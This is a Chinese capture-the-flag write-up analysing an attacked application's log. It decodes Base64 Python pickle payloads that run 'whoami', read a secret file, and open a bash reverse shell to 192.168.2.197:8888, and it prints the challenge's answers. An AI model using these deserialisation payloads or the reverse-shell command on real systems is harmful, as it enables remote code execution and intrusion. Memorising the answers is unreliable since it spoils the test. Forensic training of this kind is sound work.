问一:某应用程序被攻击,请分析日志后作答: 黑客攻击的参数是______。(如有字母请全部使用小写)。
问二:某应用程序被攻击,请分析日志后作答: 黑客查看的秘密文件的绝对路径是_____________。
问三:某应用程序被攻击,请分析日志后作答: 黑客反弹shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)。
附件:简单日志分析.zip
解题思路:
将附件下载===>解压===>app.log
打开文件,发现大量的404,黑客扫了大量不存在的页面,尝试找到有用的信息,进行利用。
我们要找200 的状态码,看看黑客是否成功攻陷
并没有发现服务器成功返回网页(200)
那我们再换一个思路,既然没有找到服务器成功返回的状态码,就去查找服务器无法完成的请求。(500)
这就意味着,黑客扫到了存在的页面,并发送了数据,但是数据没有通过服务器的检验,所以服务器无法完成该请求。
if 是判断该数据是否符合服务器的准则,如果不符合服务器将不会返回任何,无法完成请求。(500)
这时便发现了黑客请求的参数,使用Base64解密得到
问一:
这是解析的结果,第三行的'whoami' 好像是在查看用户。
I0
p0
0S'whoami'
p1
0(g0
lp2
0(I0
tp3
0(g3
I0
dp4
0cos
system
p5
0g5
(g1
tR.问二:
继续查找下一个,查看完用户,那应该就是要查看密码了,'cat /Th4s_IS_VERY_Import_Fi1e'
I0
p0
0S'cat /Th4s_IS_VERY_Import_Fi1e'
p1
0(g0
lp2
0(I0
tp3
0(g3
I0
dp4
0cos
system
p5
0g5
(g1
tR.问三:
解析第三个Base64,解码错误,查找原因
STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=
这怎么会有符号?Base64中只有+和/ 。
STAKcDAKMFMnYmFzaCAtaSA
JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=
将它们分开解析,得到以下内容。
I0
p0
0S'bash -i & /dev/tcp/192.168.2.197/8888 0>&1'
p1
0(g0
lp2
0(I0
tp3
0(g3
I0
dp4
0cos
system
p5
0g5
(g1
tR.